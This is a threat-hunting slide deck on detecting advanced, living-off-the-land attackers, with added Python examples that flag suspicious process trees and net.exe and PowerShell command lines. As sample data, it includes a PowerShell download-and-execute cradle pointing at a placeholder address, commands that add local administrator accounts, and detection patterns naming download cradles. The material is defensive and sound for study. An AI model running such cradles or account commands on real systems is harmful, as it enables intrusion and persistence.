2. Agenda

Background
Threat Landscape
Advanced Threats
• What are they?
• Zero-Days
• Why Advanced Threats might not be what you think they are
• Living off the Land ("Outsider-Insider")
Hunting
• What do you hunt?
• How do you hunt?
• Relationships Matter!
Wrap-Up & Takeaways
4. The Evolving Threat Landscape

Criminal Enterprises
• Broad-based and targeted attacks
• Financially motivated
• Getting more sophisticated

Hacktivists
• Targeted and destructive attacks
• Unpredictable motivations
• Generally less sophisticated

Nation-States
• Targeted and multi-stage attacks
• Motivated by information and IP
• Highly sophisticated, limitless resources
8. Opportunistic threats sell our computers.
Goal: breadth of access.
"Advanced" threats sell our data.
Goal: precision of access.
9. Traditional Defenses Were Designed for Opportunistic Attacks

OPPORTUNISTIC: the attacker's goal is to compromise as many endpoints as possible.
ADVANCED: the attacker's goal is to compromise as few endpoints as possible.

[Figure: two plots of Hosts Compromised vs. Time, one for opportunistic and one for advanced attacks, each with a DETECTION THRESHOLD line and the point at which a signature becomes available (for advanced attacks: "if ever").]
10. "Zero-Days"

"Zero-Day" is a term typically used to refer to two different scenarios:
• Zero-Day Vulnerability: the vulnerability is unknown, or a fix/patch is not yet available
  – "Non-Pub": an exploit for a vulnerability that is not publicly known
• Zero-Day Malware: malware that is unknown; signatures are not available
13. But once they're in…

However they get in, we need to find them! Faster detection means:
• Shorter dwell time
• Smaller scope for your incident response
• Less damage to your business

What do they do once they're in?
15. Living off the Land

Living Off the Land: the attacker uses built-in tools, so there are very few new executables. The attacker typically needs to do the following:
• Execute code:
  – Crack/dump/guess/obtain valid credentials
    » Seen with Backoff POS malware
• Copy data:
  – Utilize tools like robocopy, xcopy, cmd.exe to gather data
  – Utilize "known good" tools for compression, or use scripts
• Exfil data:
  – ftp.exe, net.exe, Visual Basic script to control IE for POSTing data
• Manipulate:
  – Download something not malicious but that will trip up detection
  – When an admin logs in, credentials, keystrokes, etc., are captured and used
• Persist:
  – Compromise or add more user and system accounts
  – Log in to backup servers, staging servers, less noticeable parts of your enterprise
  – Create scheduled jobs that will run and re-add accounts, communicate out, etc.
16. Living off the Land (cont'd)

More things to consider:
• PowerShell is TOO powerful
  – Execute from a remote URL
  – Basically anything you would ever want to write code for, you can do with PowerShell, so as an adversary I can really do some damage (PowerSploit, etc.)
• Use internal C2 sites:
  – Use blog comments and/or a wiki to give your implants new commands, so there are no outside communications
• Use well-known social networking and file-sharing sites:
  – Twitter (bots)
  – Dropbox
  – Google Drive
  – Facebook
  – < Insert Social Site Here >
• Find hardcoded credentials, re-use of the same password across an enterprise, Single-Sign-On design flaws, etc.
17. In Other Words…

THEY ARE NOW INSIDERS!
BETTER DEFENSE AGAINST THIS… LEADS TO BETTER DEFENSE AGAINST TRUE INSIDERS!
21. What do you Hunt?

Do you know what you're looking for? Do they have to be advanced?
• Are you running vulnerable software? Is it likely to be compromised?
• Have you hardened your systems, have you reduced surface area?
• Do you have shared passwords, plain-text credentials, etc.?
• If you have too much entropy or very few standards, hunting will be DIFFICULT
• Then again, it is rarely "easy"

What do the bad guys need to do?
• Execute
• Communicate
• Grab data
• Steal/add credentials
• Persist
22. Which comes first… Detection or Collection?

By prioritizing collection over detection you can:
(1) HUNT MORE EFFECTIVELY!!!
(2) Rapidly find root cause
(3) Quickly & confidently reconstruct timelines
(4) Accelerate discovery (determine scope)
(5) Benefit from hindsight (evolve)
23. Some Ideas…

§ Are abnormal user accounts being used?
§ Do Windows processes (lsass, svchost, csrss) have strange parents?
§ Are IE, Acrobat, Word, Notepad, etc., spawning child processes?
§ Are Office applications making outbound connections?
§ Is Java spawning command shells?
§ Is cmd.exe running as SYSTEM?
§ Are user accounts being added locally?
§ Are thousands of files being modified by a single process?
§ Is ftp or robocopy being used?
§ Are processes executing that don't have a .exe or .scr extension?
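The questions above can be expressed directly as rules over process-creation telemetry. The following is an added example written for this page, not code from the original deck: it runs the slide's parent/child, account and extension checks over a handful of constructed Sysmon-style process-creation records. The field names (Host, Image, ParentImage, User), the expected-parent table and all hosts, paths and user names are assumptions.

```python
"""Hunting heuristics over process-creation events (added example; not code
from the original deck).

Each rule is one of the questions on the slide, expressed as a predicate over
a single process-creation record.  The record layout (Host, Image,
ParentImage, User) mirrors Sysmon Event ID 1 fields but is an assumption, and
the sample events below are constructed, not real telemetry."""
import ntpath

# Applications that should rarely spawn child processes in normal use.
DOCUMENT_APPS = {"iexplore.exe", "acrord32.exe", "winword.exe", "excel.exe",
                 "powerpnt.exe", "outlook.exe", "notepad.exe"}
# Core Windows processes and the parent each is normally started by
# (assumption: typical for modern Windows; tune to your own baseline).
EXPECTED_PARENT = {
    "lsass.exe": {"wininit.exe"},
    "csrss.exe": {"smss.exe"},
    "svchost.exe": {"services.exe"},
}
JAVA = {"java.exe", "javaw.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
COPY_TOOLS = {"ftp.exe", "robocopy.exe"}
SYSTEM_ACCOUNT = "NT AUTHORITY\\SYSTEM"


def base(path):
    """Lower-cased file name; ntpath handles Windows paths on any platform."""
    return ntpath.basename(path).lower()


def core_strange_parent(e):
    img = base(e["Image"])
    return img in EXPECTED_PARENT and base(e["ParentImage"]) not in EXPECTED_PARENT[img]


def document_app_spawns_child(e):
    return base(e["ParentImage"]) in DOCUMENT_APPS


def java_spawns_shell(e):
    return base(e["ParentImage"]) in JAVA and base(e["Image"]) in SHELLS


def cmd_as_system(e):
    return base(e["Image"]) == "cmd.exe" and e["User"].upper() == SYSTEM_ACCOUNT


def copy_tool_used(e):
    return base(e["Image"]) in COPY_TOOLS


def odd_extension(e):
    return ntpath.splitext(base(e["Image"]))[1] not in {".exe", ".scr"}


RULES = [
    ("core_strange_parent", core_strange_parent),
    ("document_app_spawns_child", document_app_spawns_child),
    ("java_spawns_shell", java_spawns_shell),
    ("cmd_as_system", cmd_as_system),
    ("copy_tool_used", copy_tool_used),
    ("odd_extension", odd_extension),
]


def hunt(events):
    """Return (host, rule, image) for every rule that fires on every event."""
    hits = []
    for e in events:
        for name, rule in RULES:
            if rule(e):
                hits.append((e["Host"], name, base(e["Image"])))
    return hits


# Constructed sample events: one benign baseline record (ws01) and one record
# per hunting question.  Hosts, paths and user names are made up.
SAMPLE_EVENTS = [
    {"Host": "ws01", "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "User": SYSTEM_ACCOUNT},
    {"Host": "ws02", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "User": r"CORP\jsmith"},
    {"Host": "ws07", "Image": r"C:\Windows\System32\lsass.exe",
     "ParentImage": r"C:\Users\Public\update.exe", "User": SYSTEM_ACCOUNT},
    {"Host": "ws03", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Java\jre8\bin\java.exe", "User": SYSTEM_ACCOUNT},
    {"Host": "srv02", "Image": r"C:\Windows\System32\robocopy.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"CORP\backupsvc"},
    {"Host": "ws04", "Image": r"C:\Users\Public\svc.dat",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\ajones"},
]

if __name__ == "__main__":
    for host, rule, image in hunt(SAMPLE_EVENTS):
        print(f"{host}: {rule} ({image})")
```

Every rule here is cheap enough to run over a full day of process-creation events. The expected-parent table is the part that needs tuning against your own baseline: a rule that fires on legitimate service start-ups is noise a hunter will quickly learn to ignore, which defeats the point.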
24. Back to the Basics…

§ Are you recording every command line used by net.exe and looking for abnormalities?
§ Are you watching when PowerShell.exe is used?
§ Are you mapping user account activity to hosts to look for abnormal logins?
§ Are you …. <INSERT LOTS OF STUFF "TO DO" HERE>
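Recording command lines only pays off if something reads them. The following is an added example, not code from the deck, showing what "looking for abnormalities" in net.exe and PowerShell.exe command lines can mean in practice: account and group changes, admin-share use and domain enumeration via net.exe, and PowerShell launched hidden, without a profile, with an -EncodedCommand (whose base64 UTF-16LE payload is decoded and scanned as well) or with a download cradle. The event layout with a CommandLine field, the hosts, users and the payload are all constructed.

```python
"""Command-line hunting for net.exe and powershell.exe (added example; not
code from the original deck).

Records are constructed in the style of a process-creation event with a
CommandLine field (an assumption); the patterns are the abnormalities a
hunter would look for."""
import base64
import ntpath
import re

# net.exe subcommands that change accounts or groups, touch admin shares, or
# enumerate the domain.  Patterns run against the arguments after the image.
NET_PATTERNS = [
    (re.compile(r"^user\b.*\s/add\b", re.I), "net_user_add"),
    (re.compile(r"^localgroup\s+administrators\b.*\s/add\b", re.I), "net_localgroup_admin_add"),
    (re.compile(r"^use\s+\\\\\S+\\(?:admin|c)\$", re.I), "net_use_admin_share"),
    (re.compile(r"^(?:group|user)\b.*\s/domain\b", re.I), "net_domain_recon"),
]

# PowerShell switches and cradles worth a second look.  They are matched
# against the raw arguments and against the decoded -EncodedCommand payload.
PS_PATTERNS = [
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "ps_noprofile"),
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden\b", re.I), "ps_hidden_window"),
    (re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass\b", re.I), "ps_execpolicy_bypass"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I), "ps_download"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "ps_invoke_expression"),
]
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def split_cmdline(cmdline):
    """Return (image name without path or .exe, remaining arguments)."""
    m = re.match(r'\s*("[^"]*"|\S+)\s*(.*)', cmdline, re.S)
    if not m:
        return "", ""
    image = ntpath.basename(m.group(1).strip('"')).lower()
    if image.endswith(".exe"):
        image = image[:-4]
    return image, m.group(2)


def decode_encoded_command(args):
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    m = ENCODED_FLAG.search(args)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Names of every pattern that fires on one command line."""
    image, args = split_cmdline(cmdline)
    findings = []
    if image in {"net", "net1"}:
        findings += [name for rx, name in NET_PATTERNS if rx.search(args)]
    elif image in {"powershell", "pwsh"}:
        decoded = decode_encoded_command(args)
        if decoded is not None:
            findings.append("ps_encoded_command")
        text = args + "\n" + (decoded or "")
        findings += [name for rx, name in PS_PATTERNS if rx.search(text)]
    return findings


def hunt(events):
    """Keep only the events that fired at least one pattern."""
    out = []
    for e in events:
        findings = analyze(e["CommandLine"])
        if findings:
            out.append({"host": e["Host"], "user": e["User"],
                        "cmd": e["CommandLine"], "findings": findings})
    return out


# Constructed samples.  The encoded payload is built here so the example runs
# offline; 203.0.113.5 is a documentation address, not a real server.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"Host": "ws01", "User": r"CORP\jsmith", "CommandLine": "net user jsmith"},
    {"Host": "ws07", "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": r'"C:\Windows\system32\net.exe" user svc_backup Winter2014! /add'},
    {"Host": "ws07", "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": "net localgroup administrators svc_backup /add"},
    {"Host": "ws03", "User": r"CORP\ajones",
     "CommandLine": r"net use \\srv02\admin$ /user:corp\ajones P@ss"},
    {"Host": "ws03", "User": r"CORP\ajones", "CommandLine": 'net group "domain admins" /domain'},
    {"Host": "ws04", "User": r"CORP\bkim", "CommandLine": "powershell.exe -nop -w hidden -enc " + ENC},
    {"Host": "ws09", "User": r"CORP\admin",
     "CommandLine": r"powershell.exe Get-Service | Out-File C:\temp\svc.txt"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["host"], hit["user"], hit["findings"])
```

Decoding -EncodedCommand matters because the encoded form hides the cradle from any pattern that only looks at the raw command line; the same applies to scripts pulled from disk or a remote URL, which a command-line rule cannot see at all and which is where script block logging has to take over.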
25. "Response is the closest thing we have in IT to dogfighting"
- Bruce Schneier, Black Hat 2014 Keynote
26. "Time is the dominant parameter. The pilot who goes through the OODA cycle in the shortest time prevails because his opponent is caught responding to situations that have already changed."
- Col John Boyd, 1966

[OODA loop: Observe, Orient, Decide, Act]
27. Traditional IR view vs. Modern IR view

From the traditional IR view (events) to the modern IR view (actionable endpoint visibility):
• Events: most organizations only have a static view of their business and the data they manage to collect.
• Events + Intelligence: with no insight into known bad, how can they pick the needles out of their data-collection haystack?
• Events + Intelligence + Prevalence: without understanding prevalence, how can they prioritize detection events to accelerate threat discovery?
• Events + Intelligence + Prevalence + Relationships: without maintaining the recorded relationships, how do they quickly scope any impacted endpoints and lateral movement?

What's more actionable?
• "svchost.exe ran"
• "svchost.exe was spawned by an unsigned binary under an abnormal user account and made a network connection"
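The "what's more actionable?" contrast above is the difference between a single event and a scored chain of relationships. The following is an added example, not code from the deck: it joins constructed process-creation records with network-connection records on the process GUID, measures how many hosts each parent image has been seen on (prevalence), and scores every svchost.exe start by how many of the slide's abnormal relationships it carries. The field names, the ParentSigned attribute (which a real pipeline would derive from code-signing data), the fleet size and the 10% rarity cutoff are assumptions.

```python
"""Events + intelligence + prevalence + relationships (added example; not
code from the original deck).

Record fields mirror Sysmon Event ID 1 (process create) and Event ID 3
(network connect) but are assumptions, as is the ParentSigned attribute; all
sample records are constructed."""
import ntpath
from collections import defaultdict

SERVICE_ACCOUNTS = {"NT AUTHORITY\\SYSTEM", "NT AUTHORITY\\LOCAL SERVICE",
                    "NT AUTHORITY\\NETWORK SERVICE"}
TOTAL_HOSTS = 20  # assumed fleet size, used for the prevalence threshold


def base(path):
    return ntpath.basename(path).lower()


def prevalence(proc_events):
    """Number of distinct hosts on which each image path has been seen,
    counting both the child and the parent of every record."""
    hosts = defaultdict(set)
    for e in proc_events:
        hosts[e["Image"].lower()].add(e["Host"])
        hosts[e["ParentImage"].lower()].add(e["Host"])
    return {img: len(h) for img, h in hosts.items()}


def connections_by_process(net_events):
    """Join key (host, process GUID) -> list of (destination ip, port)."""
    conns = defaultdict(list)
    for n in net_events:
        conns[(n["Host"], n["ProcessGuid"])].append((n["DestinationIp"], n["DestinationPort"]))
    return conns


def score_svchost(proc_events, net_events, total_hosts=TOTAL_HOSTS):
    """One finding per svchost.exe start, ordered by how many abnormal
    relationships it carries.  A parent seen on <=10% of hosts is 'rare'."""
    prev = prevalence(proc_events)
    conns = connections_by_process(net_events)
    rare_cutoff = max(1, total_hosts // 10)
    findings = []
    for e in proc_events:
        if base(e["Image"]) != "svchost.exe":
            continue
        reasons = []
        if not e["ParentSigned"]:
            reasons.append("parent_unsigned")
        if e["User"].upper() not in SERVICE_ACCOUNTS:
            reasons.append("abnormal_user")
        proc_conns = conns.get((e["Host"], e["ProcessGuid"]), [])
        if proc_conns:
            reasons.append("network_connection")
        if prev.get(e["ParentImage"].lower(), 0) <= rare_cutoff:
            reasons.append("rare_parent")
        findings.append({"host": e["Host"], "parent": base(e["ParentImage"]),
                         "user": e["User"], "connections": proc_conns,
                         "reasons": reasons, "score": len(reasons)})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


# Constructed records.  ws01-ws05 and ws09 give services.exe a healthy
# prevalence; ws07 is the chain the slide describes.
SVCHOST = r"C:\Windows\System32\svchost.exe"
SERVICES = r"C:\Windows\System32\services.exe"
PROC_EVENTS = [
    {"Host": f"ws0{i}", "ProcessGuid": f"p{i}", "Image": SVCHOST, "ParentImage": SERVICES,
     "ParentSigned": True, "User": "NT AUTHORITY\\SYSTEM"} for i in range(1, 6)
] + [
    {"Host": "ws07", "ProcessGuid": "p7", "Image": SVCHOST,
     "ParentImage": r"C:\Users\Public\update.exe", "ParentSigned": False, "User": r"CORP\jsmith"},
    {"Host": "ws09", "ProcessGuid": "p9", "Image": SVCHOST, "ParentImage": SERVICES,
     "ParentSigned": True, "User": "NT AUTHORITY\\NETWORK SERVICE"},
]
NET_EVENTS = [  # 203.0.113.0/24 is a documentation range, not a real C2 address
    {"Host": "ws07", "ProcessGuid": "p7", "DestinationIp": "203.0.113.5", "DestinationPort": 443},
    {"Host": "ws09", "ProcessGuid": "p9", "DestinationIp": "10.0.0.5", "DestinationPort": 53},
]

if __name__ == "__main__":
    for f in score_svchost(PROC_EVENTS, NET_EVENTS):
        print(f["host"], f["score"], f["reasons"], f["connections"])
```

Note how the ws09 record, a normal svchost.exe that happens to make a DNS connection, scores one point and the ws07 chain scores four: a network connection from svchost.exe is not interesting on its own, and it is the combination of relationships, with prevalence telling you how unusual the parent is across the fleet, that makes the finding worth a hunter's time.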
28. The very nature of threat hunting requires the human element

In IT, we hire staff to support technology.
In security operations, we buy technology to support staff.
Invest in tools that enable humans to make quick decisions.
29. Hunting Tips

1. Collect the RIGHT data
Netflow data and firewall logs can help, but if you aren't seeing what is executing and what is changing on your systems, you will not have as much hunting success. You need to hunt where the adversaries live!

2. Incorporate reputation and classification information
When you're hunting, you should not have to spend time manually checking the reputation of a binary or website, as that greatly slows down your ability to continue the hunt. Being able to quickly say things are known good or known bad is key, as is the ability to say whether something is part of a particular campaign or attack.

3. Analyze RELATIONSHIPS
Relationships are key to being able to detect abnormal behavior. Sure, the adversary lives off the land, but they're still going to do unusual things with the existing tools available to them.

4. Automate as much as possible!
When you know what is normal, you should be able to be alerted when activity occurs outside of what is normal, and you should be able to automate this. You should also automate reputation and classification information retrieval, and automate discovery.
31. Take-Aways

Think about how you might hunt advanced threats
Can internal tools be used against you?
Do you have proper context? Can you tell the FBI whether or not you've seen the IOCs they just sent you?
Compare current behavior vs. older methods vs. "next-gen"
Enable your humans to do some hunting
Are you focused on root cause?